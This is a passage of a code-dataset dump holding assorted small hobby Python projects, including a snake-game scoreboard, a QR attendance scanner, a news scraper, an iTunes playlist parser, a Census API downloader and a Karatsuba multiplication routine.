np.count_nonzero(y_sensitive == 1)\n arrayNS = np.count_nonzero(y_sensitive == 2)\n \n \n numeratorVal = 0\n denominatorVal = 0\n \n for i in range(y_pred.size):\n if (y_pred[i] == 2 and y_sensitive[i] != 1):\n numeratorVal += 1\n \n elif (y_pred[i] == 2 and y_sensitive[i] == 1):\n denominatorVal += 1\n \n \n numeratorVal = numeratorVal/arrayNS\n denominatorVal = denominatorVal/arrayS\n \n di = numeratorVal/denominatorVal\n\n return di\ndef genBiasedSample(X,y,s,p,nsamples=1000):\n '''\n Oversamples instances belonging to the sensitive feature value (s != 1)\n \n Inputs:\n X - Data\n y - labels\n s - sensitive attribute\n p - probability of sampling unprivileged customer\n nsamples - size of the resulting data set (2*nsamples)\n \n Output:\n X_sample,y_sample,s_sample\n '''\n i1 = y == 1 # good\n i1 = i1[:,np.newaxis]\n i2 = y == 2 # bad\n i2 = i2[:,np.newaxis]\n \n sp = s == 1 #privileged\n sp = sp[:,np.newaxis]\n su = s != 1 #unprivileged\n su = su[:,np.newaxis]\n su1 = np.where(np.all(np.hstack([su,i1]),axis=1))[0]\n su2 = np.where(np.all(np.hstack([su,i2]),axis=1))[0]\n sp1 = np.where(np.all(np.hstack([sp,i1]),axis=1))[0]\n sp2 = np.where(np.all(np.hstack([sp,i2]),axis=1))[0]\n inds = []\n for i in range(nsamples):\n u = stats.bernoulli(p).rvs(1)\n if u == 1:\n #sample one bad instance with s != 1\n inds.append(np.random.choice(su2,1)[0])\n #sample one good instance with s == 1\n inds.append(np.random.choice(sp1,1)[0])\n else:\n #sample one good instance with s != 1\n inds.append(np.random.choice(su1,1)[0])\n #sample one bad instance with s == 1\n inds.append(np.random.choice(sp2,1)[0])\n X_sample = X[inds,:]\n y_sample = y[inds]\n s_sample = s[inds]\n \n return X_sample,y_sample,s_sample,inds\n","repo_name":"PurpleFlare/474-Project-3","sub_path":"nbFUctions.py","file_name":"nbFUctions.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"12185948723","text":"from turtle import Turtle\n\nALIGN = \"center\"\nFONT = ('Consolas', 18, 'normal')\nGAMEOVR_FONT = (\"sans-serif\", 30, 'bold')\nTOP_GAP = 30\n\nwith open('hi_score.txt', mode='r') as file:\n hi_score = int(file.read())\n\nprint(hi_score)\nclass ScoreBoard(Turtle):\n def __init__(self, scn_height):\n super().__init__()\n self.score = 0\n self.high_score = hi_score\n self.hideturtle()\n self.penup()\n self.speed('fastest')\n self.goto(x=0, y=scn_height/2 - TOP_GAP)\n self.color('white')\n\n def display_score(self):\n self.clear()\n text = f\"Score: {self.score} Highscore: {self.high_score}\"\n self.write(text, move=False, align=ALIGN, font=FONT)\n\n def reset_scoreboard(self):\n if self.score > self.high_score:\n self.high_score = self.score\n with open('hi_score.txt', mode='w') as file:\n file.write(str(self.high_score))\n\n self.score = 0\n\n # def display_game_over(self):\n # self.goto(0, 0)\n # game_ovr_txt = \"GAME OVER\"\n # self.color('red')\n # self.write(game_ovr_txt, move=False, align=ALIGN, font=GAMEOVR_FONT)\n # self.goto(0, -20)\n # self.color('white')\n # self.write(f'Final Score: {self.score}', move=False, align=ALIGN, font=FONT)\n\n def increment_score(self):\n self.score += 1\n self.display_score()","repo_name":"LucasLeow/PythonBootCamp","sub_path":"20_SnakeGame/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1388,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"19524782369","text":"\r\nfrom kivymd.app import MDApp\r\nfrom 
kivy.lang import Builder\r\nfrom pyzbar.pyzbar import ZBarSymbol\r\nfrom kivymd.uix.snackbar import Snackbar\r\nimport pandas as pd\r\nimport numpy as np\r\nimport datetime\r\n\r\nKV = \"\"\"\r\n\r\n#:import ZBarCam kivy_garden.zbarcam.ZBarCam\r\n#:import ZBarSymbol pyzbar.pyzbar.ZBarSymbol\r\nMDBoxLayout:\r\n\torientation:'vertical'\r\n\tZBarCam:\r\n\t\tid:zbarcam\r\n\t\tcode_types:ZBarSymbol.QRCODE.value,ZBarSymbol.EAN13.value\r\n\t\ton_symbols:app.on_symbols(*args)\r\n\t\t\r\n\r\n\"\"\"\r\n\r\nnombres = []\r\nmatriculas = []\r\nfecha = ''\r\nhora = ''\r\ncount = '0'\r\n\r\nclass my_app(MDApp):\r\n\t\"\"\"docstring for my_app\"\"\"\r\n\r\n\tdef build(self):\r\n\t\tself.root = Builder.load_string(KV)\r\n\r\n\tdef on_symbols(self, instance, symbols):\r\n\t\tif not symbols == \"\":\r\n\t\t\tfor symbol in symbols:\t\t\t\t\r\n\t\t\t\t# print(f'Your QR is: {symbol.data.decode()}')\r\n\t\t\t\tSnackbar(\r\n\t\t\t\t\ttext = f'Estudiante: {symbol.data.decode()}.',\r\n\t\t\t\t\tmd_bg_color = 'green',\r\n\t\t\t\t\tfont_size = 25\r\n\t\t\t\t).open()\r\n\t\t\t\tvalores = symbol.data.decode().split(\",\")\r\n\t\t\t\tif not (valores[0] in nombres) and not (valores[1] in matriculas):\r\n\t\t\t\t\tnombres.append(valores[0])\r\n\t\t\t\t\tmatriculas.append(valores[1])\r\n\t\t\t\t\tahora = datetime.datetime.now()\r\n\t\t\t\t\tfecha = ahora.strftime('%d/%m/%Y')\r\n\t\t\t\t\thora = ahora.strftime('%H:%M:%S')\r\n\r\n\t\t\t\tdata = {\r\n\t\t\t\t\t'nombre': nombres,\r\n\t\t\t\t\t'matricula': matriculas,\r\n\t\t\t\t\t'fecha': fecha,\r\n\t\t\t\t\t'hora': hora\r\n\t\t\t\t}\r\n\t\t\t\tdf = pd.DataFrame(data)\r\n\r\n\t\t\t\tdf.to_excel(f'asistencia.xlsx')\r\n\r\n\t\t\t\texcel = pd.read_excel('asistencia.xlsx')\r\n\t\t\t\tcount = str(len(excel))\r\n\t\t\t\tprint(count)\r\n\r\nif __name__ == '__main__':\r\n\tmy_app().run()\r\n\r\n\"\"\"\r\nfrom kivy import *\r\nfrom kivy.app import App\r\nfrom kivy.uix import *\r\n\r\n'''\r\nfrom kivy.app import App\r\nfrom kivy.uix.boxlayout import BoxLayout\r\nfrom kivy.graphics.texture import Texture\r\nfrom kivy.uix.camera import Camera\r\nfrom kivy.lang import Builder\r\nimport numpy as np\r\nimport cv2\r\n\r\n\r\nBuilder.load_file(\"main.kv\")\r\n\r\nclass AndroidCamera(Camera):\r\n camera_resolution = (640, 480)\r\n counter = 0\r\n\r\n\r\n def _camera_loaded(self, *largs):\r\n self.texture = Texture.create(size=np.flip(self.camera_resolution), colorfmt='rgb')\r\n self.texture_size = list(self.texture.size)\r\n\r\n def on_tex(self, *l):\r\n if self._camera._buffer is None:\r\n return None\r\n frame = self.frame_from_buf()\r\n\r\n self.frame_to_screen(frame)\r\n super(Camera, self).on_tex(*l)\r\n\r\n def frame_from_buf(self):\r\n w, h = self.resolution\r\n frame = np.frombuffer(self._camera._buffer.tostring(), 'uint8').reshape((h + h // 2, w))\r\n frame_bgr = cv2.cvtColor(frame, 93)\r\n return np.rot90(frame_bgr, 3)\r\n\r\n def frame_to_screen(self, frame):\r\n frame_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)\r\n cv2.putText(frame_rgb, str(self.counter), (20, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 255, 0), 2, cv2.LINE_AA)\r\n self.counter += 1\r\n flipped = np.flip(frame_rgb, 0)\r\n buf = flipped.tostring()\r\n self.texture.blit_buffer(buf, colorfmt='rgb', bufferfmt='ubyte')\r\n\r\nclass MyLayout(BoxLayout):\r\n pass\r\n\r\n\r\nclass MyApp(App):\r\n def build(self):\r\n return MyLayout()\r\n\r\n\r\nif __name__ == '__main__':\r\n MyApp().run()\r\n\r\n'''\r\nfrom kivy import *\r\nfrom kivy.app import App\r\nfrom kivy.uix import *\r\nfrom kivy.uix.relativelayout import 
RelativeLayout\r\nfrom kivy.uix.camera import Camera\r\n\r\n\r\n'''\r\nclass mainApp(App):\r\n\tdef build(self):\r\n\t\tpass\r\n\r\nmainApp().run()\r\n\r\n'''\r\nclass miCamara(App):\r\n\t'''docstring for Camara'''\r\n\tdef build(self):\r\n\t\trl = RelativeLayout()\r\n\t\tcam = AndroidCamera(resolution = (320, 240), size = (500, 300), pos = (0, 0), play = True )\r\n\t\trl.add_widget(cam)\r\n\t\treturn rl\r\nmiCamara().run()\r\n\"\"\"\r\n","repo_name":"numbasan-san/asistencia_qr","sub_path":"Lector/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"15170285750","text":"import os\r\nfilename = input('enter file name (.txt): ')\r\nif os.path.exists(filename):\r\n openfile = open(filename, 'r') #Precise accessibility, edit open(filename, 'path', 'r') \r\n for count, ofl in enumerate(openfile):\r\n print(f\"\\nentry({count}): {ofl}\")\r\n count += 1 #due to \"forloop\" started on index \"0\". \r\n print(f\"\\nnumber of entry: {count}\")\r\nelse:\r\n print(\"file not found, please check and try again.\")\r\n","repo_name":"BenjySoh/jubilant-garbanzo","sub_path":"filemanipulation.py","file_name":"filemanipulation.py","file_ext":"py","file_size_in_byte":432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28766538360","text":"from dotenv import load_dotenv\nimport os\nimport numpy as np\n\nload_dotenv()\ncompany_size = int(os.getenv(\"COMPANIES_SIZE\"))\n\nflow_stack = []\n\nmarket_margin = [0] * company_size\n# coefficient = value * margin\n# value up, margin down\nmarket_margin_coefficient = []\nfor i in range(company_size):\n market_margin_coefficient.append(np.random.randint(low=100, high=500) / 100)\n\nbank_balance = 0\n","repo_name":"megathere/eco-simulator","sub_path":"src/constant/market_constants.py","file_name":"market_constants.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"28740133324","text":"import json\nfrom github import Github\n\nconfig = json.loads(open('./config/config.json', 'r').read())\n\ngithub_api = Github(login_or_token=config['auth']['github']['token'])\n\nselected_repo = None\n\nrepo_url = None\ni = 1\n\nprint('Select project:')\nfor project_to_pick in config['projects']:\n repo_uri = config['projects'][i-1]['uri']\n print('{0} - {1}'.format(i, repo_uri))\n i += 1\n\nproject_number = int(input('Select project:'))\nrepo_uri = config['projects'][project_number-1]['uri']\n\nrepo = github_api.get_repo(repo_uri)\n\nprint(\"Selected project: {0}\".format(repo_uri))\n\ndefault_labels = [\n repo.get_label(\"help wanted\")\n]\n\nprint(\"\\nDefault issue labels:\")\nfor label in default_labels:\n print(\"'{0}'\".format(label.name))\nprint('***')\n\nissue_type_labels = [\n repo.get_label(\"enhancement\"),\n repo.get_label(\"bug\"),\n repo.get_label(\"documentation\"),\n]\n\nwhile True:\n try:\n issue_title = str(input('Type issue title:'))\n\n issue_labels = default_labels.copy()\n\n print('Select issue type:')\n i = 1\n for type_label in issue_type_labels:\n print('{0} - {1}'.format(i, type_label.name))\n i += 1\n selected_type_index = int(input('Enter number:')) - 1\n\n issue_labels.append(issue_type_labels[selected_type_index])\n\n print(issue_labels)\n\n created_issue = repo.create_issue(title=issue_title, labels=issue_labels)\n\n print(created_issue)\n print('Issue #{0} was 
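# --- Editor's aside (hedged sketch): filemanipulation.py above corrects its
# line counter with a manual "count += 1" because enumerate() starts at 0;
# enumerate's start parameter removes the need for that fix-up. The file name
# below is hypothetical:
import os

if os.path.exists('example.txt'):
    with open('example.txt', 'r') as openfile:
        count = 0
        for count, line in enumerate(openfile, start=1):  # 1-based from the start
            print(f"entry({count}): {line.rstrip()}")
        print(f"number of entries: {count}")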
created!'.format(created_issue.number))\n        print('Issue url: https://github.com/{0}/issues/{1}'.format(repo_uri,created_issue.number))\n        print('***\\n')\n    except Exception as e:\n        print(e)\n        print('Error!\\n\\n')\n","repo_name":"mx2s/github-automation","sub_path":"src/create_issues.py","file_name":"create_issues.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"9112120546","text":"# -*- coding: UTF-8 -*-\r\n# China Jiangsu Net (jschina.com.cn) - news scraper\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport time\r\nimport json\r\nimport codecs\r\n\r\n\r\ndef get_article_url(url, headers):\r\n    req = requests.get(url,headers=headers)\r\n    data = req.text\r\n    fp = codecs.open('test/error.txt','a+', 'utf-8')\r\n    fp.write(data)\r\n    fp.close()\r\n    soup = BeautifulSoup(data,'lxml')\r\n    article_list = soup.find_all('div',attrs={'class':'biaot'})\r\n    urls = []\r\n    for article in article_list:\r\n        article_time = article.find('span').getText()[:10]\r\n        day = int(article_time[8:10])\r\n        month = int(article_time[5:7])\r\n        now_month = int(time.localtime(time.time())[1])\r\n        now_day = int(time.localtime(time.time())[2])\r\n        if day == now_day and month == now_month:\r\n            article_url = 'http://jsnews.jschina.com.cn/jsyw/'+article.find('a')['href'][1:]\r\n            urls.append(article_url)\r\n        else:\r\n            break\r\n    return urls\r\n\r\ndef get_article(url, headers,count):\r\n    req = requests.get(url, headers=headers)\r\n    data = req.content\r\n    soup = BeautifulSoup(data,'lxml')\r\n    title = soup.find('div',attrs={'class':'text'}).find('h2').getText()\r\n    article_time = soup.find('div',attrs={'class':'text'}).find('div',attrs={'class':'info'}).find('span',attrs={'id':'pubtime_baidu'}).getText()[:10]\r\n    body = soup.find('div',attrs={'class':'article'}).find_all('p')\r\n    folder = article_time+'jsxww%s.txt'%count\r\n    fp = codecs.open('data/article.csv','a+', 'utf-8')\r\n    fp.write(title+','+article_time+','+url+','+folder+'\\r\\n')\r\n    fp.close()\r\n    fp = codecs.open('articles/'+folder, 'a+', 'utf-8')\r\n    for b in body:\r\n        text = b.getText()\r\n        fp.write(text+'\\r\\n')\r\n    fp.close()\r\n\r\n\r\ndef main():\r\n    init_url = ['http://jsnews.jschina.com.cn/jsyw/index.shtml',\r\n                'http://jsnews.jschina.com.cn/jsyw/index_1.shtml']\r\n    headers={\r\n        'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36',\r\n    }\r\n    count = 1\r\n    for url in init_url:\r\n        urls = get_article_url(url,headers)\r\n        for u in urls:\r\n            try:\r\n                get_article(u,headers,count)\r\n                count += 1\r\n                fp = codecs.open('data/log.txt','a+', 'utf-8')\r\n                fp.write('Succeeded. '+url+'\\r\\n')\r\n                fp.close()\r\n            except:\r\n                fp = codecs.open('data/log.txt','a+', 'utf-8')\r\n                fp.write('Failed. '+url+'\\r\\n')\r\n                fp.close()\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()","repo_name":"kourou1034/Python-Spider","sub_path":"spider_news/spider_jsnews.py","file_name":"spider_jsnews.py","file_ext":"py","file_size_in_byte":2607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"6923937420","text":"import plistlib\r\nfrom matplotlib import pyplot\r\nimport numpy as np\r\nimport sys\r\nimport re, argparse\r\nimport random\r\n\r\ndef findDuplicates(fileName):\r\n    \"\"\"This function searches for duplicate tracks in an iTunes playlist.\"\"\"\r\n    print('Finding duplicate tracks in %s...' 
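# --- Editor's aside (hedged sketch): the scraper above uses a bare except and
# no request timeout; a common requests pattern narrows the exception type and
# bounds the wait. fetch() and the 10-second timeout are illustrative choices:
import requests

def fetch(url, headers):
    try:
        resp = requests.get(url, headers=headers, timeout=10)
        resp.raise_for_status()                # surface HTTP 4xx/5xx as errors
        return resp.content
    except requests.RequestException as exc:   # network and HTTP failures only
        print('Failed. ' + url + ' (' + str(exc) + ')')
        return None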
% fileName)\r\n    with open(fileName, 'rb') as file:\r\n        plist = plistlib.load(file) # Read in the playlist file\r\n    tracks = plist['Tracks'] # Access the tracks dictionary in the playlist XML file\r\n    trackNames = {} # Dictionary to store duplicate tracks\r\n\r\n    for trackID, track in tracks.items():\r\n        try:\r\n            name = track['Name']\r\n            duration = track['Total Time']\r\n\r\n            # Check if the names match and if the rounded down durations match. \r\n            # Floor divide by 1000 to round to the nearest second since Apple stores duration as milliseconds\r\n            if name in trackNames and duration//1000 == trackNames[name][0]//1000:\r\n                count = trackNames[name][1]\r\n                trackNames[name] = (duration, count + 1) # trackNames is a dictionary in which the value is a pair \r\n                # containing the track's duration and the number of appearances that track has\r\n            else:\r\n                trackNames[name] = (duration, 1)\r\n\r\n        except:\r\n            pass\r\n    duplicates = []\r\n    for key, value in trackNames.items():\r\n        # Check if the count is greater than 1\r\n        if value[1] > 1:\r\n            duplicates.append((value[1], key)) # Save the count and the name of the track \r\n    if len(duplicates) > 0:\r\n        print(\"Found %d duplicates. Track names saved to duplicates.txt\" % len(duplicates))\r\n    else:\r\n        print(\"No duplicates found.\")\r\n\r\n    file = open(\"duplicates.txt\", 'w')\r\n    for value in duplicates:\r\n        file.write(\"[%d] %s\\n\" % (value[0], value[1])) # Write the count and the name of the track\r\n    file.close()\r\n\r\ndef findCommonTracks(fileNames):\r\n    \"\"\"This function attempts to find common tracks across multiple different iTunes playlists.\"\"\"\r\n    trackNameSets = []\r\n    for fileName in fileNames:\r\n        trackNames = set() # Create a set for each playlist in order to compare them through set intersection\r\n        with open(fileName, 'rb') as file:\r\n            plist = plistlib.load(file)\r\n        tracks = plist['Tracks']\r\n        for trackID, track in tracks.items():\r\n            try: \r\n                trackNames.add((track['Name'], track['Total Time']//1000)) # Add the track in as a pair of name, duration\r\n            except:\r\n                pass\r\n        trackNameSets.append(trackNames)\r\n    commonTracks = set.intersection(*trackNameSets) # Intersect the sets to find the common tracks matched by name and duration\r\n    if len(commonTracks) > 0:\r\n        file = open(\"common.txt\", 'w')\r\n        for value in commonTracks:\r\n            file.write(\"%s\\n\" % str(value)) # Write each common (name, duration) pair on its own line\r\n        file.close()\r\n        print(\"%d common tracks found. 
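# --- Editor's aside (hedged sketch): the duplicate bookkeeping in
# findDuplicates above can be expressed with collections.Counter keyed on
# (name, seconds) pairs; tracks below stands in for the plist's 'Tracks' values:
from collections import Counter

def count_duplicates(tracks):
    counts = Counter(
        (t['Name'], t['Total Time'] // 1000)   # round duration down to seconds
        for t in tracks if 'Name' in t and 'Total Time' in t
    )
    return {key: n for key, n in counts.items() if n > 1}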
Track names written to common.txt\" % len(commonTracks))\r\n    else:\r\n        print(\"No common tracks.\")\r\n\r\ndef plotStats(fileName):\r\n    \"\"\"This function creates a scatter plot, histogram, and a bar chart of statistics for a given playlist.\"\"\"\r\n    with open(fileName, 'rb') as file:\r\n        plist = plistlib.load(file)\r\n    tracks = plist['Tracks']\r\n    ratings = []\r\n    durations = []\r\n\r\n    # Loop through the tracks dictionary and add ratings to ratings list and durations to durations list\r\n    for trackID, track in tracks.items():\r\n        durations.append(track['Total Time'])\r\n        # ratings.append(track['Album Rating']) appending the actual album rating only works if there is a rating for every single \r\n        # song in the playlist, so for the sake of experimentation we will fabricate random album ratings\r\n        ratings.append(random.randint(0, 100))\r\n\r\n    if ratings == [] or durations == []:\r\n        print(\"No valid album rating or total time data in %s.\" % fileName)\r\n        return\r\n\r\n    x = (np.array(durations, np.int32)) / 60000.0 # Divide by 60000.0 to convert milliseconds to minutes\r\n    y = np.array(ratings, np.int32)\r\n\r\n    # Create scatterplot\r\n    pyplot.subplot(2, 1, 1)\r\n    pyplot.plot(x, y, 'o')\r\n    pyplot.axis([0, 1.05 * np.max(x), -1, 110]) # This alters the x and y axis to give the scatter plot some padding\r\n    pyplot.xlabel('Track Duration')\r\n    pyplot.ylabel('Rating')\r\n\r\n    # Create histogram\r\n    pyplot.subplot(2, 1, 2)\r\n    pyplot.hist(x, bins=20)\r\n    pyplot.xlabel('Track Duration')\r\n    pyplot.ylabel('Count')\r\n\r\n    # Create Bar Chart\r\n\r\n\r\n    pyplot.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n    description = \"\"\"This program parses iTunes playlist files as exported in .xml format.\"\"\"\r\n\r\n    parser = argparse.ArgumentParser(description=description) # Create the parser and a group which limits the command line arguments to 1\r\n    group = parser.add_mutually_exclusive_group()\r\n\r\n    group.add_argument('--common', nargs='*', dest='plFiles', required=False)\r\n    group.add_argument('--stats', dest='plFile', required=False)\r\n    group.add_argument('--duplicates', dest='plFileD', required=False)\r\n\r\n    args = parser.parse_args()\r\n\r\n    if args.plFiles:\r\n        findCommonTracks(args.plFiles)\r\n    elif args.plFile:\r\n        plotStats(args.plFile)\r\n    elif args.plFileD:\r\n        findDuplicates(args.plFileD)\r\n    else:\r\n        print(\"These are not the tracks you are looking for.\")\r\n","repo_name":"racerbren/iTunes-Playlist-Parser","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"10657444995","text":"def czyDoskonala(n):\n\td = []\n\n\tfor i in range(1, n-1):\n\t\tif n%i == 0:\n\t\t\td.append(i)\n\n\tif sum(d) == n:\n\t\treturn True\n\telse:\n\t\treturn False\n\nif __name__ == '__main__':\n\t\n\tl = int(input(\"Enter a number: \"))\n\n\tif czyDoskonala(l):\n\t\tprint(\"The number is perfect\")\n\n\telse:\n\t\tprint(\"The number is not perfect\")","repo_name":"dragenet/matura-informatyka-python","sub_path":"2_liczby_doskonale/czydoskonala.py","file_name":"czydoskonala.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"7237075023","text":"import pandas as pd\nimport requests\nimport json\nimport os\nfrom dotenv import load_dotenv, find_dotenv\n\nload_dotenv(find_dotenv())\n\ndf = pd.DataFrame()\nyears = ['2011', '2012', '2013', '2014', '2015', '2016', 
'2017', '2018', '2019', '2020', '2021']\nkey = os.environ.get('CENSUS_KEY')\nfields_pre_2017 = 'DP05_0001E,DP05_0005E,DP05_0006E,DP05_0007E,DP05_0059E,DP05_0060E,DP05_0061E,DP05_0062E,DP05_0063E,DP05_0064E'\nfields_post_2016 = 'DP05_0001E,DP05_0005E,DP05_0006E,DP05_0007E,DP05_0064E,DP05_0065E,DP05_0066E,DP05_0067E,DP05_0068E,DP05_0069E'\nzip_codes = '37302,37315,37321,37341,37343,37350,37363,37373,37377,37379,37402,37403,37404,37405,37406,37407,37408,37409,37410,37411,37412,37415,37416,37419,37421'\n\nfield_mapping_post_2016 = {\n 'DP05_0001E': 'TOTAL POPULATION',\n 'DP05_0005E': 'TOTAL POPULATION_UNDER 5 YEARS',\n 'DP05_0006E': 'TOTAL POPULATION_5 TO 9 YEARS',\n 'DP05_0007E': 'TOTAL POPULATION_10 TO 14 YEARS',\n 'DP05_0064E': 'TOTAL POPULATION_WHITE',\n 'DP05_0065E': 'TOTAL POPULATION_BLACK OR AFRICAN AMERICAN',\n 'DP05_0066E': 'TOTAL POPULATION_AMERICAN INDIAN AND ALASKA NATIVE',\n 'DP05_0067E': 'TOTAL POPULATION_ASIAN',\n 'DP05_0068E': 'TOTAL POPULATION_NATIVE HAWAIIAN AND OTHER PACIFIC ISLANDER',\n 'DP05_0069E': 'TOTAL POPULATION_SOME OTHER RACE',\n \"zip code tabulation area\": \"ZIPCODE\",\n}\n\nfields_mapping_pre_2017 = {\n'DP05_0001E': 'TOTAL POPULATION',\n'DP05_0005E': 'TOTAL POPULATION_UNDER 5 YEARS',\n'DP05_0006E': 'TOTAL POPULATION_5 TO 9 YEARS',\n'DP05_0007E': 'TOTAL POPULATION_10 TO 14 YEARS',\n'DP05_0059E': 'TOTAL POPULATION_WHITE',\n'DP05_0060E': 'TOTAL POPULATION_BLACK OR AFRICAN AMERICAN',\n'DP05_0061E': 'TOTAL POPULATION_AMERICAN INDIAN AND ALASKA NATIVE',\n'DP05_0062E': 'TOTAL POPULATION_ASIAN',\n'DP05_0063E': 'TOTAL POPULATION_NATIVE HAWAIIAN AND OTHER PACIFIC ISLANDER',\n'DP05_0064E': 'TOTAL POPULATION_SOME OTHER RACE',\n\"zip code tabulation area\": \"ZIPCODE\",\n}\n\n\nfor year in years:\n\n if df.empty:\n url_pre_2020 = f'https://api.census.gov/data/{year}/acs/acs5/profile?get=NAME,{fields_pre_2017}&for=zip%20code%20tabulation%20area:{zip_codes}&in=state:47&key={key}' \n response = requests.request(url=url_pre_2020, method=\"GET\")\n response.raise_for_status()\n data = response.json()\n\n df=pd.DataFrame(data[1:], columns=data[0]).rename(columns=fields_mapping_pre_2017)\n df['YEAR'] = year\n df.drop(columns=['NAME', 'state'],inplace=True)\n\n elif year in ['2011', '2012', '2013', '2014', '2015', '2016',]:\n url_pre_2020 = f'https://api.census.gov/data/{year}/acs/acs5/profile?get=NAME,{fields_pre_2017}&for=zip%20code%20tabulation%20area:{zip_codes}&in=state:47&key={key}'\n response = requests.request(url=url_pre_2020, method=\"GET\")\n response.raise_for_status()\n data = response.json()\n\n df2=pd.DataFrame(data[1:], columns=data[0]).rename(columns=fields_mapping_pre_2017)\n df2.drop(columns=['NAME', 'state'],inplace=True)\n df2['YEAR'] = year\n df = pd.concat([df, df2], axis=0)\n\n elif year in ['2017', '2018', '2019']:\n url_pre_2020 = f'https://api.census.gov/data/{year}/acs/acs5/profile?get=NAME,{fields_post_2016}&for=zip%20code%20tabulation%20area:{zip_codes}&in=state:47&key={key}'\n response = requests.request(url=url_pre_2020, method=\"GET\")\n response.raise_for_status()\n data = response.json()\n\n df2=pd.DataFrame(data[1:], columns=data[0]).rename(columns=field_mapping_post_2016)\n df2.drop(columns=['NAME', 'state'],inplace=True)\n df2['YEAR'] = year\n df = pd.concat([df, df2], axis=0)\n else:\n url_post_2019 = f'https://api.census.gov/data/{year}/acs/acs5/profile?get=NAME,{fields_post_2016}&for=zip%20code%20tabulation%20area:{zip_codes}&key={key}'\n response = requests.request(url=url_post_2019, method=\"GET\")\n response.raise_for_status()\n data = 
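# --- Editor's aside (hedged sketch): the ACS census download loop above
# (census_dp05.py) grows df with pd.concat inside the loop, which re-copies all
# accumulated rows each year; collecting frames first and concatenating once is
# the usual pandas idiom. Toy frames for illustration:
import pandas as pd

frames = [pd.DataFrame({'YEAR': [y], 'TOTAL POPULATION': [0]}) for y in ('2011', '2012')]
df_all = pd.concat(frames, axis=0, ignore_index=True)  # single concatenation at the end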
response.json()\n\n df2=pd.DataFrame(data[1:], columns=data[0]).rename(columns=field_mapping_post_2016)\n df2.drop(columns=['NAME',],inplace=True)\n df2['YEAR'] = year\n df = pd.concat([df, df2], axis=0)\n\ncity_mapping = {\n '37302': 'Apison',\n '37315': 'Collegedale',\n '37321': 'Dayton',\n '37341': 'Harrison',\n '37343': 'Hixson',\n '37350': 'Lookout Mountain',\n '37363': 'Ooltewah',\n '37373': 'Sale Creek',\n '37377': 'Signal Mountain',\n '37379': 'Soddy Daisy',\n '37402': 'Chattanooga',\n '37403': 'Chattanooga',\n '37404': 'Chattanooga',\n '37405': 'Chattanooga',\n '37406': 'Chattanooga',\n '37407': 'Chattanooga',\n '37408': 'Chattanooga',\n '37409': 'Chattanooga',\n '37410': 'Chattanooga',\n '37411': 'Chattanooga',\n '37412': 'Chattanooga',\n '37415': 'Chattanooga',\n '37416': 'Chattanooga',\n '37419': 'Chattanooga',\n '37421': 'Chattanooga',\n}\n\ndf = df.reset_index(drop=True)\ndf['CITY'] = df['ZIPCODE'].map(city_mapping)","repo_name":"crumblbear/TNChildCare","sub_path":"ChildCareTN/census_dp05.py","file_name":"census_dp05.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"2784885537","text":"# Karatsuba's Algorithm\n# when n is a power of 2\n\ndef multiply(x,y,n):\n if n == 1:\n return int(x)*int(y)\n a = x[:n//2]\n b = x[n//2:]\n c = y[:n//2]\n d = y[n//2:]\n return (pow(10,n)*multiply(a,c,n//2)) + (pow(10,n//2)*(multiply(a,d,n//2)+multiply(b,c,n//2))) + multiply(b,d,n//2)\n\n\nif __name__ == \"__main__\":\n print(multiply('1234','9876',4))\n ","repo_name":"pradyutnathradhae/interview_Program","sub_path":"Greedy Algorithms/fastmultiply.py","file_name":"fastmultiply.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"24758535200","text":"# -*- coding: utf-8 -*-\n\"\"\"Public section, including homepage and signup.\"\"\"\nimport re\n\nfrom flask import (\n Blueprint,\n current_app,\n flash,\n render_template,\n request,\n send_from_directory,\n)\nfrom flask.helpers import url_for\nfrom werkzeug.utils import redirect\n\nfrom buyhistory.utils import flash_errors\n\nfrom .forms import QueryForm\n\nblueprint = Blueprint(\"public\", __name__, static_folder=\"../static\")\n\n\n@blueprint.route(\"/\", methods=[\"GET\", \"POST\"])\ndef home():\n \"\"\"Home page.\"\"\"\n form = QueryForm()\n current_app.logger.info(\"Hello from the home page!\")\n if request.method == \"POST\":\n if form.validate_on_submit():\n address = form.address.data\n res = re.search(r\"amazon.(\\S{2,6})/\\S{1,4}/(\\w+)\", address)\n try:\n domain = res.group(1)\n asin = res.group(2)\n return redirect(\n url_for(\n \"public.result\", domain=domain, asin=asin, range=form.range.data\n )\n )\n except:\n flash(\"Please check your Amazon address!\", \"danger\")\n else:\n flash_errors(form)\n return render_template(\"public/home.html\", form=form)\n\n\n@blueprint.route(\"/res//\")\ndef result(asin, range=\"90\"):\n form = QueryForm()\n domain = request.args.get(\"domain\", \"com\")\n range = request.args.get(\"range\", \"90\")\n return render_template(\n 